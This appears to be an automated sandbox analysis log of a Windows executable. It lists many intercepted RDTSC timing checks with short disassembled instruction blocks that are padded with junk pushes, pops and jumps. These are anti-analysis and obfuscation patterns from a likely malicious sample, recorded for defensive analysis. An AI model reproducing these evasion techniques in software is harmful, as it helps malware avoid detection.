Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: AF3E5E second address: AF3EB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 nop 0x00000007 push esi 0x00000008 jmp 00007F6FA0B89513h 0x0000000d pop ebx 0x0000000e push 00000000h 0x00000010 push 00000000h 0x00000012 push edx 0x00000013 call 00007F6FA0B89508h 0x00000018 pop edx 0x00000019 mov dword ptr [esp+04h], edx 0x0000001d add dword ptr [esp+04h], 0000001Bh 0x00000025 inc edx 0x00000026 push edx 0x00000027 ret 0x00000028 pop edx 0x00000029 ret 0x0000002a mov di, 7299h 0x0000002e push 00000000h 0x00000030 mov dword ptr [ebp+129C25A9h], ecx 0x00000036 push eax 0x00000037 push eax 0x00000038 push edx 0x00000039 ja 00007F6FA0B89508h 0x0000003f rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: AF2F1F second address: AF2F37 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 js 00007F6FA127EBD6h 0x00000009 push edi 0x0000000a pop edi 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f jo 00007F6FA127EBE4h 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: AF4D4F second address: AF4D8A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6FA0B8950Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b jmp 00007F6FA0B8950Ch 0x00000010 nop 0x00000011 xor bl, 00000048h 0x00000014 push 00000000h 0x00000016 mov dword ptr [ebp+12B71EA7h], ecx 0x0000001c push 00000000h 0x0000001e mov dword ptr [ebp+129C1AA5h], esi 0x00000024 xchg eax, esi 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: AF4D8A second address: AF4D8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: AF2F37 second address: AF2FC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F6FA0B89506h 0x0000000a popad 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push ebp 0x0000000f call 00007F6FA0B89508h 0x00000014 pop ebp 0x00000015 mov dword ptr [esp+04h], ebp 0x00000019 add dword ptr [esp+04h], 00000017h 0x00000021 inc ebp 0x00000022 push ebp 0x00000023 ret 0x00000024 pop ebp 0x00000025 ret 0x00000026 push dword ptr fs:[00000000h] 0x0000002d sub dword ptr [ebp+129C33A6h], edi 0x00000033 mov dword ptr fs:[00000000h], esp 0x0000003a jmp 00007F6FA0B8950Eh 0x0000003f mov eax, dword ptr [ebp+129C07E5h] 0x00000045 push 00000000h 0x00000047 push eax 0x00000048 call 00007F6FA0B89508h 0x0000004d pop eax 0x0000004e mov dword ptr [esp+04h], eax 0x00000052 add dword ptr [esp+04h], 0000001Ah 0x0000005a inc eax 0x0000005b push eax 0x0000005c ret 0x0000005d pop eax 0x0000005e ret 0x0000005f mov edi, dword ptr [ebp+129C38E4h] 0x00000065 push FFFFFFFFh 0x00000067 sbb di, 8E51h 0x0000006c push eax 0x0000006d push eax 0x0000006e push edx 0x0000006f pushad 0x00000070 jp 00007F6FA0B89506h 0x00000076 push eax 0x00000077 push edx 0x00000078 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: AF4D8E second address: AF4D98 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F6FA127EBD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: AF2FC5 second address: AF2FCA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: AF40B8 second address: AF40BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: AF40BC second address: AF40C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: AF5EE8 second address: AF5F09 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F6FA127EBE5h 0x0000000b popad 0x0000000c push eax 0x0000000d pushad 0x0000000e push esi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: AF9803 second address: AF980B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: AF980B second address: AF980F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: A9528E second address: A9529F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edi 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jnl 00007F6FA0B89506h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: A9529F second address: A952B2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6FA127EBDFh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: A952B2 second address: A952B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: A952B8 second address: A952D6 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F6FA127EBE8h 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: A952D6 second address: A952DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: AFE5A4 second address: AFE5AF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jl 00007F6FA127EBD6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: AFE5AF second address: AFE5C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F6FA0B8950Fh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: AFE5C7 second address: AFE5CC instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: AFE770 second address: AFE776 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: AFE776 second address: AFE786 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 ja 00007F6FA127EBDEh 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: AFE786 second address: AFE78A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: AFE78A second address: AFE78F instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: A8CE33 second address: A8CE46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 je 00007F6FA0B89514h 0x0000000b je 00007F6FA0B8950Eh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B0B35F second address: B0B37A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6FA127EBE7h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B0B37A second address: B0B39A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ecx 0x0000000b jnp 00007F6FA0B89512h 0x00000011 jmp 00007F6FA0B8950Ch 0x00000016 push ebx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B0A4E9 second address: B0A51C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F6FA127EBD6h 0x0000000a jp 00007F6FA127EBD6h 0x00000010 popad 0x00000011 jno 00007F6FA127EBEEh 0x00000017 push eax 0x00000018 push edx 0x00000019 push edi 0x0000001a pop edi 0x0000001b rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B0A51C second address: B0A520 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B0A520 second address: B0A52D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 pushad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B0A52D second address: B0A56A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6FA0B89514h 0x00000009 jmp 00007F6FA0B89515h 0x0000000e jmp 00007F6FA0B8950Ch 0x00000013 popad 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B0A6D2 second address: B0A714 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6FA127EBE2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F6FA127EBE2h 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 jmp 00007F6FA127EBE4h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B0A714 second address: B0A71B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B0A71B second address: B0A722 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B0A8A1 second address: B0A8B1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6FA0B8950Ch 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B0A8B1 second address: B0A8C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jng 00007F6FA127EBDCh 0x0000000c rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B0ACCA second address: B0ACD8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6FA0B8950Ah 0x00000009 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B0ACD8 second address: B0ACDC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B0AE8E second address: B0AE9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F6FA0B89506h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B0AE9B second address: B0AEA0 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B0AEA0 second address: B0AEE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F6FA0B89506h 0x0000000a pop edx 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F6FA0B8950Bh 0x00000014 pushad 0x00000015 pushad 0x00000016 popad 0x00000017 jmp 00007F6FA0B8950Eh 0x0000001c jmp 00007F6FA0B89516h 0x00000021 push edx 0x00000022 pop edx 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B0AEE4 second address: B0AEEE instructions: 0x00000000 rdtsc 0x00000002 jne 00007F6FA127EBDEh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B0B218 second address: B0B21E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B0B21E second address: B0B222 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B0B222 second address: B0B226 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B0E5DF second address: B0E5F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F6FA127EBD6h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d jmp 00007F6FA127EBDBh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B0E5F7 second address: B0E5FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B0E5FD second address: B0E603 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B15674 second address: B1567A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B1567A second address: B15688 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F6FA127EBDEh 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B15688 second address: B15694 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F6FA0B8950Eh 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B15994 second address: B159B6 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F6FA127EBD6h 0x00000008 jmp 00007F6FA127EBE4h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B15C3E second address: B15C42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B15C42 second address: B15C46 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B15C46 second address: B15C7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jng 00007F6FA0B89508h 0x0000000e jmp 00007F6FA0B8950Ah 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 pushad 0x00000018 popad 0x00000019 pop eax 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F6FA0B89512h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B15C7B second address: B15C81 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B15E2C second address: B15E34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B16159 second address: B1615D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B16402 second address: B1640A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B166DF second address: B166E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B166E3 second address: B166F1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jg 00007F6FA0B89520h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: A8CE01 second address: A8CE33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F6FA127EBE4h 0x0000000a js 00007F6FA127EBEEh 0x00000010 jmp 00007F6FA127EBE2h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B1BD42 second address: B1BD64 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jl 00007F6FA0B89506h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 jmp 00007F6FA0B8950Eh 0x00000016 pushad 0x00000017 popad 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B1BEE5 second address: B1BEE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B1BEE9 second address: B1BEED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B1BEED second address: B1BF03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F6FA127EBD6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jg 00007F6FA127EBD6h 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B1BF03 second address: B1BF07 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B1BF07 second address: B1BF0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B1BF0D second address: B1BF13 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B1BF13 second address: B1BF17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B1BF17 second address: B1BF36 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6FA0B89516h 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B1C0A6 second address: B1C0AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B1C0AB second address: B1C0BD instructions: 0x00000000 rdtsc 0x00000002 je 00007F6FA0B8950Ch 0x00000008 jnc 00007F6FA0B89506h 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B1C0BD second address: B1C0C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B1C0C3 second address: B1C0C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B1C0C7 second address: B1C0CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B1C0CB second address: B1C0D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edi 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B1C0D8 second address: B1C0DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B1C239 second address: B1C23D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B1C23D second address: B1C24D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a js 00007F6FA127EBD6h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B1C3CE second address: B1C3D4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B1B683 second address: B1B697 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6FA127EBE0h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: AE0B79 second address: AE0B7D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: AE0B7D second address: ABAD66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 nop 0x00000008 mov ecx, dword ptr [ebp+129C35A4h] 0x0000000e call dword ptr [ebp+129C1907h] 0x00000014 je 00007F6FA127EBF7h 0x0000001a jl 00007F6FA127EBE2h 0x00000020 push eax 0x00000021 pushad 0x00000022 popad 0x00000023 jmp 00007F6FA127EBDBh 0x00000028 pop eax 0x00000029 jns 00007F6FA127EBE6h 0x0000002f push esi 0x00000030 pushad 0x00000031 popad 0x00000032 pop esi 0x00000033 jg 00007F6FA127EBDCh 0x00000039 push eax 0x0000003a push edx 0x0000003b rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: AE11BC second address: AE11DA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6FA0B89514h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: AE11DA second address: AE11DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: AE11DE second address: AE11E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: AE11E2 second address: AE122C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jno 00007F6FA127EBDCh 0x0000000c popad 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 pushad 0x00000012 push edi 0x00000013 jns 00007F6FA127EBD6h 0x00000019 pop edi 0x0000001a jmp 00007F6FA127EBE7h 0x0000001f popad 0x00000020 mov eax, dword ptr [eax] 0x00000022 pushad 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007F6FA127EBDDh 0x0000002a rdtsc
